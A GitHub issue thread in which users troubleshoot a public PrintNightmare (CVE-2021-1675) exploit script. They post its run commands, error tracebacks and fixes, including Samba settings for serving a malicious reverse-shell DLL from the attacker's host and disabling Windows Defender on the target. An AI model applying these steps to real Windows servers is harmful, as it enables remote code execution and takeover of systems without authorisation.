impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Open braieralves opened this issue 3 years ago • 17 comments

Hello.

I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Has anyone had the same problem, or does anyone know how I can solve it, please?

Complete stdout:

"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\172.16.224.6\smb\fakeprinter.dll'
[*] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
  File "./CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "./CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."

User exists in the AD: "balves"

Target: WS 2019

Thanks

braieralves avatar Jul 03 '21 17:07 braieralves

Did you copy the smb.conf in the README exactly? i.e. did you include this line: force user = smbuser

If so, remove that line or change smbuser to a valid username on your attacking machine.

rewks avatar Jul 03 '21 18:07 rewks

Thanks for your help, @rewks .

I tried all combinations of users:

  • force user = smbuser
  • force user = administrator (with and without domain)
  • force user = balves (with and without domain)

Nothing works.

If I remove the line, another error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."

braieralves avatar Jul 03 '21 19:07 braieralves

Same error on any test machine =/

braieralves avatar Jul 03 '21 19:07 braieralves

Try force user = nobody

korang avatar Jul 04 '21 02:07 korang

Hello, @korang .

Thanks. But if I make any changes in "force user =", this new error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."

I don't have any more ideas of what it can be =(

braieralves avatar Jul 04 '21 08:07 braieralves

When I disable "Windows Defender", the script works =)

Thanks

braieralves avatar Jul 04 '21 08:07 braieralves

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

@cube0x0

@braieralves you disabled "Windows Defender" on the server, was that it?

I have this same error!

I tried the options but with no success!

Any idea?

wtechsec avatar Jul 04 '21 13:07 wtechsec

Hello @wtechsec .

Disable Windows Defender: https://jv16powertools.com/how-to-disable-windows-defender-windows-10/

Then, I created an AD user called "smbuser" (as in the /etc/samba/smb.conf).

After this, the exploit worked.

braieralves avatar Jul 04 '21 15:07 braieralves

Hey @braieralves ,
I am having the same problem as you. Could you help me?

┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@[email protected] '\\192.168.40.155>\smb\rev.dll'

[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

mrh3r000 avatar Jul 06 '21 07:07 mrh3r000

Hey @mrh3r000

Review this item: \192.168.40.155>\smb\rev.dll - Correct form: \192.168.40.155\smb\rev.dll

braieralves avatar Jul 06 '21 15:07 braieralves

I did it again from where and got the same error as the picture T_T. Could you help me ? image

mrh3r000 avatar Jul 07 '21 10:07 mrh3r000

@mrh3r000 was your "file.dll" made correctly?

braieralves avatar Jul 07 '21 10:07 braieralves

@braieralves Sure... :(( image

mrh3r000 avatar Jul 07 '21 10:07 mrh3r000

Still having the problem....

┌──(root💀kali)-[/tmp/CVE-2021-1675]
└─# python3 CVE-2021-1675.py smbuser:[email protected] '\10.1.1.37\smb\reverse.dll'
[*] Connecting to ncacn_np:10.1.1.111[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing ??\UNC\10.1.1.37\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
  File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

surfd4wg avatar Jul 31 '21 19:07 surfd4wg

Hi @mrh3r000, did you run smbserver? If not, get smbserver.py from GitHub and run it as follows: smbserver.py smb /tmp. PS: /tmp is the path to your file.

Rao005 avatar Nov 02 '21 06:11 Rao005

Well, I had the same problem and I solved it, but I don't know if it can help you. When the PoC is executed, the victim machine tries to look for a shared resource through SMB. Before, I tried with smbserver.py from impacket, but it didn't work. Instead, I activated the SMB service with sudo systemctl start smb, which looks for the configuration file /etc/samba/smb.conf, sharing my /tmp/share folder. I created the malicious dll in /tmp/share. My /etc/samba/smb.conf file looks like this:

[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

T1erno avatar Jun 03 '22 05:06 T1erno

Hello everyone. I'm sorry for the delay in answering. Let me analyze your questions and see if I can help, ok?

I'll take a look next weekend, ok?

Regards.

braieralves avatar Jun 03 '22 09:06 braieralves